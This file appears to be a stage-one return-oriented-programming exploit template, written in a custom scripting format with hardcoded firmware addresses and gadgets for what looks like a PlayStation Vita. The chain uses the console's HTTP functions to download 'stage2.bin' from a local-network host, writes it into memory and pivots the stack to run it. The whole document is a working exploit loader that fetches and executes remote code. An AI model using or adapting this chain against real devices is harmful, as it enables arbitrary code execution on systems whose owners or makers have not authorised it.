%(set_data_base(0x81200000))s

data
{
    func infloop = 0x89C00A4F;
    func svc = 0x89ED8CC0;

    func sceHttpCreateTemplate = 0x89ED84DC;
    func sceHttpCreateConnectionWithURL = 0x89ED859C;
    func sceHttpCreateRequestWithURL = 0x89ED857C;
    func sceHttpSendRequest = 0x89ED853C;
    func sceHttpReadData = 0x89ED851C;

    symbol LDM_ADDR = 0x81204000;
    symbol LDM_ADDR_SP = 0x8120400C;
    symbol LDM_ADDR_PC = 0x81204010;
    symbol STAGE2_URL = %(writes("http://192.168.2.1:8000/stage2.bin"))s;
    symbol STAGE2_ADDR = 0x812E0000;
    symbol HTTP_HANDLE = %(writes("AAAAAAAA"))s;
    symbol POP_GADGET = 0x89C004A7;
}

code : entry
{
    $writedata$

    sceHttpCreateTemplate(
        %(writes(""))s /*useragent*/,
        2 /*http_ver*/,
        1 /*auto_proxy*/);

    sceHttpCreateConnectionWithURL(RET, STAGE2_URL, 0);
    sceHttpCreateRequestWithURL(RET, 0, STAGE2_URL, 0, 0, 0);
    storeret(HTTP_HANDLE);

    loadret(HTTP_HANDLE);
    sceHttpSendRequest(RET, 0, 0);

    loadret(HTTP_HANDLE);
    sceHttpReadData(RET, STAGE2_ADDR, 0x10000);

    store(STAGE2_ADDR, LDM_ADDR_SP);
    store(POP_GADGET,  LDM_ADDR_PC);
    pivot(LDM_ADDR);

    infloop(0);
}
